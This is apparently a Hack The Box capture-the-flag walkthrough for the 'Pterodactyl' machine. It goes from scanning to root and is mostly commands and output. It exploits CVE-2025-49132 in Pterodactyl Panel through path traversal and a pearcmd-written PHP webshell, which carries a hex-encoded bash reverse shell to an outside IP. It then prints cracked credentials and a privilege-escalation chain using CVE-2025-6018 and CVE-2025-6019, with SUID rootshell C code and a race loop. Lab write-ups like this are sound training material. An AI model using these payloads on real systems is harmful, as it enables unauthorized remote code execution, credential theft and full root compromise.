Information Gathering

# Nmap 7.98 scan initiated Mon Feb  9 18:09:25 2026 as: /usr/lib/nmap/nmap -p 22,80 -sC -sV -Pn -n -oN scan_results/nmap_details.txt 10.129.219.125
Nmap scan report for 10.129.219.125
Host is up (0.074s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.6 (protocol 2.0)
| ssh-hostkey:
|   256 a3:74:1e:a3:ad:02:14:01:00:e6:ab:b4:18:84:16:e0 (ECDSA)
|_  256 65:c8:33:17:7a:d6:52:3d:63:c3:e4:a9:60:64:2d:cc (ED25519)
80/tcp open  http    nginx 1.21.5
|_http-title: Did not follow redirect to http://pterodactyl.htb/
|_http-server-header: nginx/1.21.5

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Feb  9 18:09:35 2026 -- 1 IP address (1 host up) scanned in 9.91 seconds

Dirsearch

dirsearch -u http://pterodactyl.htb/ -e txt,html,php

/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: txt, html, php | HTTP method: GET | Threads: 25 | Wordlist size: 10403

Output File: /home/kali/Work/HTB/Pterodactyl/reports/http_pterodactyl.htb/__26-02-11_15-51-37.txt

Target: http://pterodactyl.htb/

[15:51:37] Starting:
[15:51:54] 403 -  555B  - /.ht_wsr.txt
[15:51:54] 403 -  555B  - /.htaccess.bak1
[15:51:54] 403 -  555B  - /.htaccess.orig
[15:51:54] 403 -  555B  - /.htaccess_sc
[15:51:54] 403 -  555B  - /.htaccess_orig
[15:51:54] 403 -  555B  - /.htaccess.save
[15:51:54] 403 -  555B  - /.htaccess_extra
[15:51:54] 403 -  555B  - /.htaccess.sample
[15:51:54] 403 -  555B  - /.htaccessOLD
[15:51:54] 403 -  555B  - /.htaccessBAK
[15:51:54] 403 -  555B  - /.htaccessOLD2
[15:51:54] 403 -  555B  - /.htm
[15:51:54] 403 -  555B  - /.html
[15:51:54] 403 -  555B  - /.htpasswd_test
[15:51:54] 403 -  555B  - /.htpasswds
[15:51:54] 403 -  555B  - /.httr-oauth
[######              ] 30%   3214/10403        62/s       [15:53:01] 200 -  920B  - /changelog.txt
[15:54:05] 200 -   72KB - /phpinfo.php
[15:54:14] 403 -  555B  - /Public/

Discovered version: Pterodactyl Panel v1.11.10

This version contains an RCE vulnerability: arbitrary code execution via the /locales/locale.json file with locale and namespace query parameters without authentication.

FFUF Fuzzing Virtual Hosts

ffuf -w /usr/share/wordlists/dirb/big.txt -u http://pterodactyl.htb -H "Host: FUZZ.pterodactyl.htb" -fs 145

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://pterodactyl.htb
 :: Wordlist         : FUZZ: /usr/share/wordlists/dirb/big.txt
 :: Header           : Host: FUZZ.pterodactyl.htb
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response size: 145
________________________________________________
panel                   [Status: 200, Size: 1897, Words: 490, Lines: 36, Duration: 545ms]

Adding this virtual host panel.pterodactyl.htb provides the control panel login interface for pterodactyl.htb

Vulnerability Analysis

CVE-2025-49132

Core Principle:

1. Entry point: /locales/locale.json endpoint with unfiltered parameters.
2. Path traversal: locale parameter uses ../ to escape the language directory.
3. File locking: namespace parameter specifies the target filename (backend auto-appends .php).
4. Leak mechanism: Backend executes PHP files (such as config/database.php), mistakenly treats the returned array as a language pack, and converts to JSON for output.

Exploitation:

GET /locales/locale.json?locale=../../../pterodactyl&namespace=config/database

Obtained database credentials pterodactyl:PteraPanel, attempted SSH and page login, but no success.

RCE

Seen in phpinfo:

• register_argc_argv => On
• include_path => .:/usr/share/php8:/usr/share/php/PEAR

So can test: http://panel.pterodactyl.htb/locales/locale.json?locale=../../../../../../../../usr/share/php/PEAR&namespace=pearcmd&+config-create+...

Response shows: config-create: must have 2 parameters, root path and filename to save as

Indicates the first is content, the second is the storage location.

Construct payload:

http://panel.pterodactyl.htb/locales/locale.json?locale=../../../../../../../../usr/share/php/PEAR&namespace=pearcmd&+config-create+<?=system('id')?>+/tmp/shell.php

If using the browser directly, special characters will be URL encoded, so use curl.

curl -s -g -k "http://panel.pterodactyl.htb/locales/locale.json?locale=../../../../../../usr/share/php/PEAR&namespace=pearcmd&+config-create+/&/<?=system('id')?>+/tmp/shell.php"

Access http://panel.pterodactyl.htb/locales/locale.json?locale=../../../../../../../../usr/share/php/PEAR&namespace=pearcmd&+config-create+/<?=system(hex2bin('6964'))?>+/tmp/shell.php

Can see

Achieve reverse shell:

echo -n "bash -c 'bash -i >& /dev/tcp/10.10.16.18/443 0>&1'"|xxd -p|tr -d '\n'
# result:62617368202d63202762617368202d69203e26202f6465762f7463702f31302e31302e31362e31382f34343320303e263127

Write file

curl -s -g -k "http://panel.pterodactyl.htb/locales/locale.json?locale=../../../../../../usr/share/php/PEAR&namespace=pearcmd&+config-create+/&/<?=system(hex2bin('62617368202d63202762617368202d69203e26202f6465762f7463702f31302e31302e31362e31382f34343320303e263127'))?>+/tmp/shell.php"

Achieve reverse shell

curl -s -g -k "http://panel.pterodactyl.htb/locales/locale.json?locale=../../../../../../tmp&namespace=shell"

Can obtain initial foothold (www's shell)

Exploitation (User Flag)

Can access /home/phileasfogg3 to obtain user.txt

Privilege Escalation (Root Flag)

Let's check the database

mariadb -u pterodactyl -p -h 127.0.0.1
# Enter password: PteraPanel

Obtained hashes for two users, cracked to get credentials:

phileasfogg3:!QAZ2wsx

CVE-2025-6018: PAM Identity Spoofing Vulnerability

This is the vulnerability you just mentioned regarding ~/.pam_environment.

• Core Principle: Exists in the configuration of PAM (Pluggable Authentication Modules). In systems like openSUSE and SUSE Linux Enterprise 15, the pam_env.so module enables user_readenv=1 by default.
• Attack Vector: After logging in via SSH, the attacker creates a malicious file in their home directory.
  • Content to write: XDG_SEAT=seat0 and XDG_VTNR=1.
• Result: When the system processes the login session, Polkit (PolicyKit) is misled into thinking you are at the physical terminal in front of the computer (i.e., the allow_active state).
• Limitation: It only grants you the permissions of a 'local active user' and not true Root, but it opens the door to high-privilege Polkit operations.

CVE-2025-6019: libblockdev Logic Vulnerability

This vulnerability has a broader impact, affecting almost all major distributions including Ubuntu, Debian, Fedora, etc.

• Core Principle: Exists in libblockdev (a library for low-level block device operations) and is triggered via the udisks daemon.
• Vulnerability Details: When the system calls libblockdev to resize an XFS (Extents File System) filesystem, the program temporarily mounts that filesystem.
• Attack Vector:
• Result: The attacker executes the SUID program in the image at the moment of mounting, instantly gaining Root privileges.

Exploiting CVE-2025-6018

phileasfogg3@pterodactyl:~> cat .pam_environment

XDG_SEAT OVERRIDE=seat0
XDG_VTNR OVERRIDE=1

phileasfogg3@pterodactyl:~> env | grep XDG
XDG_VTNR=1
XDG_SESSION_ID=184
XDG_SESSION_TYPE=tty
XDG_DATA_DIRS=/usr/share
XDG_SESSION_CLASS=user
XDG_SEAT=seat0
XDG_RUNTIME_DIR=/run/user/1002
XDG_CONFIG_DIRS=/etc/xdg

Check if SEAT is seat0 and STATE is active

phileasfogg3@pterodactyl:~> loginctl --no-pager
SESSION  UID USER         SEAT  TTY   STATE  IDLE SINCE
     20 1002 phileasfogg3 seat0 pts/0 active no

1 sessions listed.

Confirm Polkit ticket

phileasfogg3@pterodactyl:~> pkcheck --action-id org.freedesktop.udisks2.filesystem-mount --process $$ && echo "VULNERABLE: Polkit is bypassed!"

VULNERABLE: Polkit is bypassed!

If it does not pop up a password prompt and directly prints VULNERABLE, then you have already obtained the privilege escalation ticket for CVE-2025-6019.

Exploiting CVE-2025-6019

Step 1: Create a malicious XFS image on the attacking machine

# 1. Create a 300MB empty image file
dd if=/dev/zero of=xfs.image bs=1M count=300

# 2. Format as XFS (Extents File System)
mkfs.xfs xfs.image

# 3. Mount the image and plant the SUID shell wrapper
mkdir -p ./mnt
sudo mount -o loop xfs.image ./mnt

# 4. Write and compile a simple SUID privilege escalation program (more stable than directly copying bash)
cat << EOF > rootshell.c
#include <unistd.h>
#include <stdlib.h>
int main() {
    setuid(0);
    setgid(0);
    system("/bin/bash -p");
    return 0;
}
EOF
gcc rootshell.c -o ./mnt/rootshell

# 5. Set the crucial SUID (Set User ID) permission
sudo chmod 4755 ./mnt/rootshell

# 6. Unmount the image
sudo umount ./mnt
rm rootshell.c

Execute the above file with sudo. Upload to the target: sshpass -p '!QAZ2wsx' scp xfs.image phileasfogg3@pterodactyl.htb:/tmp/

Step 2: Trigger privilege escalation on the target machine

# 1. Enter the /tmp directory
cd /tmp

# 2. Set up the loop device (Loop Device)
# udisksctl: User-space Disk Control Tool
LOOP_DEV=$(udisksctl loop-setup --file /tmp/xfs.image --no-user-interaction | grep -o '/dev/loop[0-9]*')
echo "Loop Device: $LOOP_DEV"

# 3. Trigger the vulnerability: use gdbus to call the Resize method
# This forces libblockdev (Block Device Manipulation Library) to mount the image in a vulnerable way
gdbus call --system --dest org.freedesktop.UDisks2 \
    --object-path "/org/freedesktop/UDisks2/block_devices/${LOOP_DEV##*/}" \
    --method org.freedesktop.UDisks2.Filesystem.Resize 0 '{}'

# 4. Find the mount point and run the privilege escalation program
# After the vulnerability is triggered, the image will be mounted under /tmp/blockdev-xxxx
MOUNT_PATH=$(find /tmp -maxdepth 1 -name "blockdev-*" -type d 2>/dev/null)
if [ -z "$MOUNT_PATH" ]; then
    echo "[-] Mount failed, check if you are an Active session."
else
    echo "[+] Found mount at: $MOUNT_PATH"
    $MOUNT_PATH/rootshell
fi

Step 3: Start the snatching loop

# 1. Start an extremely intensive background snatcher
(while true; do 
    target=$(find /tmp -maxdepth 1 -name "blockdev-*" -type d 2>/dev/null)
    if [ -n "$target" ]; then
        echo "[!] MOUNT DETECTED: $target"
        $target/rootshell
        break
    fi
done) &

# 2. Get the process ID of the snatcher
SNATCHER_PID=$!

# 3. Re-setup the loop device (assuming you uploaded the image)
LOOP_DEV=$(udisksctl loop-setup --file /tmp/xfs.image --no-user-interaction | grep -o '/dev/loop[0-9]*')

# 4. Trigger the vulnerability (multiple triggers increase success rate)
for i in {1..3}; do
    gdbus call --system --dest org.freedesktop.UDisks2 \
        --object-path "/org/freedesktop/UDisks2/block_devices/${LOOP_DEV##*/}" \
        --method org.freedesktop.UDisks2.Filesystem.Resize 0 '{}'
done

# 5. If successful, you will get a Root Shell; if not, kill the snatcher
kill $SNATCHER_PID 2>/dev/null

Finally

phileasfogg3@pterodactyl:/tmp> find /tmp/blockdev.* -name "rootshell" -perm -4000 2>/dev/null
/tmp/blockdev.38YCK3/rootshell
phileasfogg3@pterodactyl:/tmp> /tmp/blockdev.38YCK3/rootshell -p
pterodactyl:/tmp # id
uid=0(root) gid=0(root) groups=0(root),100(users)
·1pterodactyl:/tmp # cat /root/root.txt